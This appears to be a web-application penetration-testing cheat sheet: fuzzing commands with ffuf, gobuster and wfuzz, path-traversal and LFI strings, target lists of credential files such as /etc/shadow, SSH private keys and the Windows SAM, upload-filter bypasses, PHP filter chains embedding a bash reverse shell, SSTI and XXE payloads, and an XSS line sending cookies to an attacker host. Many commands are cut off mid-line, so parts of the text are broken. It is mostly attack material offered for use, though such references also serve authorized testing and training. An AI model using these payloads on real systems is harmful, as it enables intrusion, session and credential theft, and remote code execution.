Skip to main content

Page

Web Application Analysis

Burp Suite

Ctrl+r // Sending request to repeater Ctrl+i // Sending request to intruder Ctrl+Shift+b // base64 encoding Ctrl+Shift+u // URL decoding

Set Proxy Environment Variables

export HTTP\_PROXY=<https://tinyurl.com/3fjzq> export HTTPS\_PROXY=<https://tinyurl.com/4mk9oz>

cadaver

cadaver http\:///\<WEBDAV\_DIRECTORY>/

dav:/\<WEBDAV\_DIRECTORY>/> cd C dav:/\<WEBDAV\_DIRECTORY>/C/> ls dav:/\<WEBDAV\_DIRECTORY>/C/> put


Cross-Site Scripting (XSS)

alert(1) alert('XSS'); alert(document.cookies) document.querySelector('#foobar-title').textContent  =  '\<TEXT>' fetch('https\://\<RHOST>/steal?cookie=' + btoa(document.cookie)); user.changeEmail('user\@domain'); &#x20;

ffuf

ffuf -w /usr/share/wordlists/dirb/common.txt -u http\:///FUZZ --fs -
ffuf -w /usr/share/wordlists/dirb/common.txt -u http\:///FUZZ --fw -
ffuf -w /usr/share/wordlists/dirb/common.txt -u http\:///FUZZ -mc 200,204,301 ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u h ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http\://<

API Fuzzing

ffuf -u https\:///api/v2/FUZZ -w api\_seen\_in\_wild.txt -c -ac -t 250 -fc 400,4

Searching for LFI

ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http\://

Fuzzing with PHP Session ID

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercas

Recursion

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-smal

File Extensions

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-smal

Rate Limiting

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-smal

Virtual Host Discovery

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt

Massive File Extension Discovery

ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http\://\<RHOST

GitTools


./gitdumper.sh http\:///.git/ /PATH/TO/FOLDER ./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/

Gobuster

-e; // extended mode that renders the full url -k // skip ssl certificate validation -r // follow cedirects -s // status codes -b // exclude status codes -k // ignore certificates --wildcard // set wildcard option
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u h $ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http\://\<RHOS $ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http\:/// -x php,txt,h $ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-lis
//

Common File Extensions

txt,bak,php,html,js,asp,aspx

Common Picture Extensions

png,jpg,jpeg,gif,bmp

POST Requests

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-

DNS Recon

gobuster dns -d -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-t gobuster dns -d -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdom

VHost Discovery

gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subd gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subd

Specifiy User Agent

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u htt

Local File Inclusion (LFI)

http:///.php?file=
http:///.php?file=../../../../../../../../etc/passwd
http:////php?file=../../../../../../../../../../etc/passwd

Until php 5.3:

http:////php?file=../../../../../../../../../../etc/passwd%00

Null Byte

%00 0x00

Encoded Traversal Strings

../ ..\
../ %2e%2e%2f
%252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ....\\

php://filter Wrapper

[Link 1](https://tinyurl.com/yux6oqdu)
[Link 2](https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion)
[Link 3](https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion#wrapper-phpfilter)
url=php://filter/convert.base64-encode/resource=file:////var/www//api.php
http:///index.php?page=php://filter/convert.base64-encode/resource=index
http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/pass
base64 -d .php

Django, Rails, or Node.js Web Application Header Values

Accept: ../../../../.././../../../../etc/passwd{{
Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{

Linux Files

/etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf /etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow

/etc/at.deny /etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny /etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts /etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log /etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini /etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/knockd.conf /etc/lighttpd.conf /etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release /etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf /etc/network/interfaces /etc/networks /etc/npasswd

/etc/passwd /etc/php4.4/fcgi/php.ini /etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini /etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini /etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini /etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf /etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb /etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-release /etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config /etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf /etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf /etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-ftpd.log /logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf

/opt/xampp/etc/php.ini /proc/cmdline /proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules /proc/mounts /proc/net/arp /proc/net/tcp /proc/net/udp /proc//cmdline /proc//maps /proc/sched_debug /proc/self/cwd/app.py /proc/self/environ /proc/self/net/arp /proc/stat /proc/swaps /proc/version /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini /usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log /usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log /usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini /usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php

/usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf /usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf /usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf /usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl /usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl /var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log /var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf /var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log /var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log /var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log /var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log /var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog /var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog /var/log/exim/rejectlog /var/log/faillog /var/log/ftplog

/var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log /var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log /var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message /var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log /var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root /var/webmin/miniserv.log /var/www/html/ init .py /var/www/html/db_connect.php /var/www/html/utils.php /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log /var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history

~/.bash_history ~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history ~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa ~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc ~/.Xresources ~/.xsession

Windows Files

C:/Users/Administrator/NTUser.dat C:/Documents and Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log C:/Program Files/Apache Group/Apache/logs/error.log

C:/Program Files/FileZilla Server/FileZilla Server.xml C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml C:/Windows/System32/inetsrv/config/applicationHost.config

C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

PDF PHP Inclusion

Create a file with a PDF header, which contains PHP code.

%PDF-1.4
http:///index.php?page=uploads/.pdf%00&cmd=whoami

PHP Upload Filter Bypasses

.sh .cgi .inc .txt .pht .phtml .phP .Php .php3 .php4 .php5 .php7 .pht .phps .phar .phpt .pgif .phtml .phtm .php%00.jpeg

.php%20 .php%0d%0a.jpg .php%0a .php.jpg

.php%00.gif .php\x00.gif .php%00.png .php\x00.png .php%00.jpg .php\x00.jpg mv .jpg .php\x00.jpg

PHP Filter Chain Generator

Link

python3 php_filter_chain_generator.py --chain ''
python3 php_filter_chain_generator.py --chain ""
python3 php_filter_chain_generator.py --chain """"""
python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -
python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -
http:///?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaG
python3 php_filter_chain_generator.py --chain ''
[+] The following gadget chain will generate the following code : <?= exec($_GET[0]
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|co

PHP Generic Gadget Chains (PHPGGC)

phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/.txt /PATH/TO/FILE/.txt

Server-Side Request Forgery (SSRF)

https:///item/2?server=server./file?id=9&x=

Server-Side Template Injection (SSTI)

Fuzz String

Link

${{<%[%'"}}%

Magic Payload

Link

{{ ''. class . mro [1]. subclasses () }}

Upload Vulnerabilities

ASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution SVG: Stored XSS / Server-Side Request Forgery GIF: Stored XSS CSV: CSV Injection XML: XXE AVI: Local File Inclusion / Server-Side request Forgery HTML/JS: HTML Injection / XSS / Open Redirect PNG / JPEG: Pixel Flood Attack ZIP: Remote Code Exection via Local File Inclusion PDF / PPTX: Server-Side Request Forgery / Blind XXE

wfuzz

wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http:///FUZZ/.ph

Write to File

wfuzz -w /PATH/TO/WORDLIST -c -f -u http:// --hc 403,404

Custom Scan with limited Output

wfuzz -w /PATH/TO/WORDLIST -u http:///dev/304c0c90fbc6520610abbf378e2339d1/d

Fuzzing two Parameters at once

wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>

Domain

wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -

Subdomain

wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -

Git

wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://

Login

wfuzz -X POST -u "http://:/login.php" -d "email=FUZZ&password=<PASSWORD>"
wfuzz -X POST -u "http://:/login.php" -d "username=FUZZ&password=<PASSWORD>"

SQL

wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=<FUZZ>'

DNS

wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ."
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ."
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ."

Numbering Files

wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 https://

Enumerating PIDs

wfuzz -u 'https://<URL>' -z range,900-1000

WPScan

wpscan --url https:// --enumerate u,t,p
wpscan --url https:// --plugins-detection aggressive
wpscan --url https:// --disable-tls-checks
wpscan --url https:// --disable-tls-checks --enumerate u,t,p
wpscan --url http:// -U -P passwords.txt -t 50

XML External Entity (XXE)

Skeleton Payload Request

GET / HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 136

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://<HOST>:80/shell.php">]>

&xxe;
Payloads
&passwd;
username=%26username%3b&version=1.0.0--><!DOCTYPE+username+[+<!ENTITY+username+SYST